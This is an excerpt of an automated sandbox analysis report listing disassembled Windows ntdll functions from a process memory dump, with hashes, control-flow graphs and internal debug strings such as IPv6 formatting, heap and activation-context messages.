                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b30fdf4966081f19b68ed91a62a31329efd876f9ed1cf29186d2734ffcec4ba8
                                                • Instruction ID: a30c9070b0ef3a6e50c7213780f54e69bf679de359328e14264734d747cbc8ce
                                                • Opcode Fuzzy Hash: b30fdf4966081f19b68ed91a62a31329efd876f9ed1cf29186d2734ffcec4ba8
                                                • Instruction Fuzzy Hash: 7590022134140003D64071585818A06400597E1301F55D012E1425728CDD15895A5A22
                                                Function 36DA2AD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3035d9ee84b54718975fdcda9b1b1c8de3a17291461a68123d94a6bb3d479a84
                                                • Instruction ID: fe5407dcfda1e25515a29a275973c8ffc27d3a0a18b7da24c1a76adb6ab15f6e
                                                • Opcode Fuzzy Hash: 3035d9ee84b54718975fdcda9b1b1c8de3a17291461a68123d94a6bb3d479a84
                                                • Instruction Fuzzy Hash: DF900225251400030605B5580B04907004647D5351355C022F2026724CDA2189655921
                                                Function 36DA2AF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a076af1faf5142633275b42ea64bc4758be5aa275ce992e050d2944ece59cbd
                                                • Instruction ID: 8600430c319bab0425ba1a7954682a1c2d0fda0fc0338a3de68b894e664c0dea
                                                • Opcode Fuzzy Hash: 3a076af1faf5142633275b42ea64bc4758be5aa275ce992e050d2944ece59cbd
                                                • Instruction Fuzzy Hash: 5B900225261400020645B5580A0490B044557D6351395C016F2427764CCA2189695B21
                                                Function 36DA2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecf4908c6c01cf5a2557aba0ca115d2e93cac750a289332c365cfc0dfd1e67a4
                                                • Instruction ID: aff90224d0d71e6703d0440d0eae04837ecf2532505feb06e5fb310e8a7aec0e
                                                • Opcode Fuzzy Hash: ecf4908c6c01cf5a2557aba0ca115d2e93cac750a289332c365cfc0dfd1e67a4
                                                • Instruction Fuzzy Hash: 749002A1241540924A00B2588804F0A450547E0201B55C017E2065734CC92589559935
                                                Function 36DA2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5287a35dfefa31f7013dfdbf043c3212ef8e27d43009d53cccbdbfbfedf1d8b9
                                                • Instruction ID: 8dd18b56a92ce8cdd68bedc667916946441461661e43ed7b0077f61875ac24c2
                                                • Opcode Fuzzy Hash: 5287a35dfefa31f7013dfdbf043c3212ef8e27d43009d53cccbdbfbfedf1d8b9
                                                • Instruction Fuzzy Hash: 8890023124140802D68071584804A4A000547D1301F95C016A1036728DCE158B5D7FA1
                                                Function 36DA2BE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 700439a90301adc7f3dedfa28e5329e7ba6158d8f4e24d5e70e5bbc290e9977d
                                                • Instruction ID: 773cc8e829c4dc077bef487f6481b9d657d7c22256753a960d7614ce4508a2df
                                                • Opcode Fuzzy Hash: 700439a90301adc7f3dedfa28e5329e7ba6158d8f4e24d5e70e5bbc290e9977d
                                                • Instruction Fuzzy Hash: 5B90023124544842D64071584804E46001547D0305F55C012A1075768D9A258E59BE61
                                                Function 36DA2B80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1118fdcaead04a63b6728c199fa9e41a85553f05fe1fc57c7de5f02586d83b05
                                                • Instruction ID: 124a7b86730694f7d2b56d9372cde1f3c48e3e47f67d5814a3ac322a188290a7
                                                • Opcode Fuzzy Hash: 1118fdcaead04a63b6728c199fa9e41a85553f05fe1fc57c7de5f02586d83b05
                                                • Instruction Fuzzy Hash: 7490023124140802D60471584C04A86000547D0301F55C012A7035729E9A6589957931
                                                Function 36DA2BA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 452be0b534bcefee265fe72c566c19e795a8ac98bb132d1ae6306536dbb1b1e8
                                                • Instruction ID: fb46e758178071173318f9e9498c938c0993bbc6e5748c17c98fdfe747e2bc25
                                                • Opcode Fuzzy Hash: 452be0b534bcefee265fe72c566c19e795a8ac98bb132d1ae6306536dbb1b1e8
                                                • Instruction Fuzzy Hash: 8D90023164540802D65071584814B46000547D0301F55C012A1035728D8B558B597EA1
                                                Function 36DA2B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2bc5360544755f81f16d78fe4f2cd92f07c4e03f0aae5983a600896b50602e44
                                                • Instruction ID: c438c6bb81acfd7ebb68c675f091ed2701fd91019f88f94e5b2169af76806f0a
                                                • Opcode Fuzzy Hash: 2bc5360544755f81f16d78fe4f2cd92f07c4e03f0aae5983a600896b50602e44
                                                • Instruction Fuzzy Hash: ED90026124240003460571584814A16400A47E0201B55C022E2025764DC92589956925
                                                Function 36DA2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: c02b29ee58435a18e8e1a9ad96ff6420740d68f698a3105e8d5f519372309a82
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 36DA2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1125 36da2890-36da28b3 1126 36dda4bc-36dda4c0 1125->1126 1127 36da28b9-36da28cc 1125->1127 1126->1127 1128 36dda4c6-36dda4ca 1126->1128 1129 36da28ce-36da28d7 1127->1129 1130 36da28dd-36da28df 1127->1130 1128->1127 1131 36dda4d0-36dda4d4 1128->1131 1129->1130 1132 36dda57e-36dda585 1129->1132 1133 36da28e1-36da28e5 1130->1133 1131->1127 1134 36dda4da-36dda4de 1131->1134 1132->1130 1135 36da28eb-36da28fa 1133->1135 1136 36da2988-36da298e 1133->1136 1134->1127 1138 36dda4e4-36dda4eb 1134->1138 1139 36dda58a-36dda58d 1135->1139 1140 36da2900-36da2905 1135->1140 1137 36da2908-36da290c 1136->1137 1137->1133 1141 36da290e-36da291b 1137->1141 1142 36dda4ed-36dda4f4 1138->1142 1143 36dda564-36dda56c 1138->1143 1139->1137 1140->1137 1144 36da2921 1141->1144 1145 36dda592-36dda599 1141->1145 1147 36dda50b 1142->1147 1148 36dda4f6-36dda4fe 1142->1148 1143->1127 1146 36dda572-36dda576 1143->1146 1149 36da2924-36da2926 1144->1149 1156 36dda5a1-36dda5c9 call 36db0050 1145->1156 1146->1127 1150 36dda57c call 36db0050 1146->1150 1152 36dda510-36dda536 call 36db0050 1147->1152 1148->1127 1151 36dda504-36dda509 1148->1151 1153 36da2928-36da292a 1149->1153 1154 36da2993-36da2995 1149->1154 1164 36dda55d-36dda55f 1150->1164 1151->1152 1152->1164 1160 36da292c-36da292e 1153->1160 1161 36da2946-36da2966 call 36db0050 1153->1161 1154->1153 1158 36da2997-36da29b1 call 36db0050 1154->1158 1174 36da2969-36da2974 1158->1174 1160->1161 1167 36da2930-36da2944 call 36db0050 1160->1167 1161->1174 1171 36da2981-36da2985 1164->1171 1167->1161 1174->1149 1176 36da2976-36da2979 1174->1176 1176->1156 1177 36da297f 1176->1177 1177->1171
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 1a682abf9227eda770279e6943ba48fac12b9d1943453597e9c39ea92c277f88
                                                • Instruction ID: b50ebef037316f869c9c263666cf77de37664aba32527dfa014a975d327ac7c1
                                                • Opcode Fuzzy Hash: 1a682abf9227eda770279e6943ba48fac12b9d1943453597e9c39ea92c277f88
                                                • Instruction Fuzzy Hash: FB51E8B6E08316BEEB10DF6ACD8057EF7B8BB082407588269E494D7641D774DE10CBE1
                                                Function 36E12410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1178 36e12410-36e12433 1179 36e12439-36e1243d 1178->1179 1180 36e124ec-36e124ff 1178->1180 1179->1180 1181 36e12443-36e12447 1179->1181 1182 36e12501-36e1250a 1180->1182 1183 36e12513-36e12515 1180->1183 1181->1180 1184 36e1244d-36e12451 1181->1184 1182->1183 1185 36e1250c 1182->1185 1186 36e12517-36e1251b 1183->1186 1184->1180 1187 36e12457-36e1245b 1184->1187 1185->1183 1188 36e12538-36e1253e 1186->1188 1189 36e1251d-36e1252c 1186->1189 1187->1180 1191 36e12461-36e12468 1187->1191 1190 36e12543-36e12547 1188->1190 1192 36e12540 1189->1192 1193 36e1252e-36e12536 1189->1193 1190->1186 1194 36e12549-36e12556 1190->1194 1195 36e124b6-36e124be 1191->1195 1196 36e1246a-36e12471 1191->1196 1192->1190 1193->1190 1197 36e12564 1194->1197 1198 36e12558-36e12562 1194->1198 1195->1180 1199 36e124c0-36e124c4 1195->1199 1200 36e12473-36e1247b 1196->1200 1201 36e12484 1196->1201 1203 36e12567-36e12569 1197->1203 1198->1203 1199->1180 1204 36e124c6-36e124ea call 36db0510 1199->1204 1200->1180 1205 36e1247d-36e12482 1200->1205 1202 36e12489-36e124ab call 36db0510 1201->1202 1216 36e124ae-36e124b1 1202->1216 1207 36e1256b-36e1256d 1203->1207 1208 36e1258d-36e1258f 1203->1208 1204->1216 1205->1202 1207->1208 1211 36e1256f-36e1258b call 36db0510 1207->1211 1213 36e12591-36e12593 1208->1213 1214 36e125ae-36e125d0 call 36db0510 1208->1214 1223 36e125d3-36e125df 1211->1223 1213->1214 1218 36e12595-36e125ab call 36db0510 1213->1218 1214->1223 1220 36e12615-36e12619 1216->1220 1218->1214 1223->1203 1225 36e125e1-36e125e4 1223->1225 1226 36e12613 1225->1226 1227 36e125e6-36e12610 call 36db0510 1225->1227 1226->1220 1227->1226
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 185af4dffad9be9bfa0fc608220f16e2231c4a9784e3688edb54ee92229dfd5c
                                                • Instruction ID: 6e56cd5f0dc05934073012509a40231711ec51f77047059759b6a615a2efab39
                                                • Opcode Fuzzy Hash: 185af4dffad9be9bfa0fc608220f16e2231c4a9784e3688edb54ee92229dfd5c
                                                • Instruction Fuzzy Hash: A0516974E00645AFEB24CF9CCC8087FBBF8EF44244B508459E496C3A45EB74DA88EB65
                                                Function 36E3A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1427 36e3a670-36e3a6e9 call 36d72410 * 2 RtlDebugPrintTimes 1433 36e3a89f-36e3a8c4 call 36d725b0 * 2 call 36da4c30 1427->1433 1434 36e3a6ef-36e3a6fa 1427->1434 1436 36e3a724 1434->1436 1437 36e3a6fc-36e3a709 1434->1437 1441 36e3a728-36e3a734 1436->1441 1439 36e3a70b-36e3a70d 1437->1439 1440 36e3a70f-36e3a715 1437->1440 1439->1440 1443 36e3a7f3-36e3a7f5 1440->1443 1444 36e3a71b-36e3a722 1440->1444 1445 36e3a741-36e3a743 1441->1445 1447 36e3a81f-36e3a821 1443->1447 1444->1441 1448 36e3a736-36e3a73c 1445->1448 1449 36e3a745-36e3a747 1445->1449 1450 36e3a827-36e3a834 1447->1450 1451 36e3a755-36e3a77d RtlDebugPrintTimes 1447->1451 1453 36e3a73e 1448->1453 1454 36e3a74c-36e3a750 1448->1454 1449->1447 1456 36e3a836-36e3a843 1450->1456 1457 36e3a85a-36e3a866 1450->1457 1451->1433 1463 36e3a783-36e3a7a0 RtlDebugPrintTimes 1451->1463 1453->1445 1455 36e3a86c-36e3a86e 1454->1455 1455->1447 1460 36e3a845-36e3a849 1456->1460 1461 36e3a84b-36e3a851 1456->1461 1462 36e3a87b-36e3a87d 1457->1462 1460->1461 1464 36e3a857 1461->1464 1465 36e3a96b-36e3a96d 1461->1465 1466 36e3a870-36e3a876 1462->1466 1467 36e3a87f-36e3a881 1462->1467 1463->1433 1475 36e3a7a6-36e3a7cc RtlDebugPrintTimes 1463->1475 1464->1457 1468 36e3a883-36e3a889 1465->1468 1469 36e3a8c7-36e3a8cb 1466->1469 1470 36e3a878 1466->1470 1467->1468 1471 36e3a8d0-36e3a8f4 RtlDebugPrintTimes 1468->1471 1472 36e3a88b-36e3a89d RtlDebugPrintTimes 1468->1472 1474 36e3a99f-36e3a9a1 1469->1474 1470->1462 1471->1433 1479 36e3a8f6-36e3a913 RtlDebugPrintTimes 1471->1479 1472->1433 1475->1433 1480 36e3a7d2-36e3a7d4 1475->1480 1479->1433 1484 36e3a915-36e3a944 RtlDebugPrintTimes 1479->1484 1482 36e3a7f7-36e3a80a 1480->1482 1483 36e3a7d6-36e3a7e3 1480->1483 1487 36e3a817-36e3a819 1482->1487 1485 36e3a7e5-36e3a7e9 1483->1485 1486 36e3a7eb-36e3a7f1 1483->1486 1484->1433 1493 36e3a94a-36e3a94c 1484->1493 1485->1486 1486->1443 1486->1482 1488 36e3a81b-36e3a81d 1487->1488 1489 36e3a80c-36e3a812 1487->1489 1488->1447 1490 36e3a814 1489->1490 1491 36e3a868-36e3a86a 1489->1491 1490->1487 1491->1455 1494 36e3a972-36e3a985 1493->1494 1495 36e3a94e-36e3a95b 1493->1495 1498 36e3a992-36e3a994 1494->1498 1496 36e3a963-36e3a969 1495->1496 1497 36e3a95d-36e3a961 1495->1497 1496->1465 1496->1494 1497->1496 1499 36e3a987-36e3a98d 1498->1499 1500 36e3a996 1498->1500 1501 36e3a99b-36e3a99d 1499->1501 1502 36e3a98f 1499->1502 1500->1467 1501->1474 1502->1498
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP:
                                                • API String ID: 3446177414-2466845122
                                                • Opcode ID: 7898d4efcf01875933a2088cbd09fcc9733f7aec13d05cfa8532aca80db245ac
                                                • Instruction ID: 3eb31c9cf5cec3fa5af0e043156638c1d40d531b8510b6aa6e2d93ba3210e53a
                                                • Opcode Fuzzy Hash: 7898d4efcf01875933a2088cbd09fcc9733f7aec13d05cfa8532aca80db245ac
                                                • Instruction Fuzzy Hash: 3DA1EE75A063518FE704CF28C894A1AB7E6FF88354F25452DE945DB350EBB0EC8ACB91
                                                Function 36D97630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1503 36d97630-36d97651 1504 36d9768b-36d97699 call 36da4c30 1503->1504 1505 36d97653-36d9766f call 36d6e660 1503->1505 1510 36dd4638 1505->1510 1511 36d97675-36d97682 1505->1511 1515 36dd463f-36dd4645 1510->1515 1512 36d9769a-36d976a9 call 36d97818 1511->1512 1513 36d97684 1511->1513 1519 36d976ab-36d976c1 call 36d977cd 1512->1519 1520 36d97701-36d9770a 1512->1520 1513->1504 1517 36dd464b-36dd46b8 call 36def290 call 36da9020 RtlDebugPrintTimes BaseQueryModuleData 1515->1517 1518 36d976c7-36d976d0 call 36d97728 1515->1518 1517->1518 1535 36dd46be-36dd46c6 1517->1535 1518->1520 1530 36d976d2 1518->1530 1519->1515 1519->1518 1523 36d976d8-36d976e1 1520->1523 1527 36d9770c-36d9770e 1523->1527 1528 36d976e3-36d976f2 call 36d9771b 1523->1528 1534 36d976f4-36d976f6 1527->1534 1528->1534 1530->1523 1537 36d976f8-36d976fa 1534->1537 1538 36d97710-36d97719 1534->1538 1535->1518 1539 36dd46cc-36dd46d3 1535->1539 1537->1513 1540 36d976fc 1537->1540 1538->1537 1539->1518 1541 36dd46d9-36dd46e4 1539->1541 1542 36dd47be-36dd47d0 call 36da2c50 1540->1542 1543 36dd47b9 call 36da4d48 1541->1543 1544 36dd46ea-36dd4723 call 36def290 call 36daaaa0 1541->1544 1542->1513 1543->1542 1552 36dd473b-36dd476b call 36def290 1544->1552 1553 36dd4725-36dd4736 call 36def290 1544->1553 1552->1518 1558 36dd4771-36dd477f call 36daa770 1552->1558 1553->1520 1561 36dd4786-36dd47a3 call 36def290 call 36ddcf9e 1558->1561 1562 36dd4781-36dd4783 1558->1562 1561->1518 1567 36dd47a9-36dd47b2 1561->1567 1562->1561 1567->1558 1568 36dd47b4 1567->1568 1568->1518
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36DD46FC
                                                • Execute=1, xrefs: 36DD4713
                                                • ExecuteOptions, xrefs: 36DD46A0
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 36DD4787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36DD4725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36DD4742
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36DD4655
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: b0f995d00085b579fb49f5f15237850cd559a116822ac5515ee61d729927518b
                                                • Instruction ID: 02829c9a37efa48fe78915aa93415c088ae81be188fdb3989418e2b3243164ee
                                                • Opcode Fuzzy Hash: b0f995d00085b579fb49f5f15237850cd559a116822ac5515ee61d729927518b
                                                • Instruction Fuzzy Hash: 37510675A00219BAEB11ABA5DC89BEA77F8EF44344F5400A9D604AB180EB709E45CFA1
                                                Function 36D7A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC79FA
                                                • Actx , xrefs: 36DC7A0C, 36DC7A73
                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36DC7AE6
                                                • SsHd, xrefs: 36D7A3E4
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC79D5
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DC79D0, 36DC79F5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-1988757188
                                                • Opcode ID: be7d0a069a2ee35bda63fba4df762cba0070c0e46de7bb43a4d40c3690d591b5
                                                • Instruction ID: 483870cbc875ed63071a5a7fa597540f5ae82ff35c60b06fb31b74f7943b54fd
                                                • Opcode Fuzzy Hash: be7d0a069a2ee35bda63fba4df762cba0070c0e46de7bb43a4d40c3690d591b5
                                                • Instruction Fuzzy Hash: EAE1E6B5A047028FE714CF25C884B5A77E1BF88358F584A2DF899CB290DB72D945CB93
                                                Function 36D7D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC936B
                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36DC9565
                                                • GsHd, xrefs: 36D7D874
                                                • Actx , xrefs: 36DC9508
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DC9346
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DC9341, 36DC9366
                                                Memory Dump Source
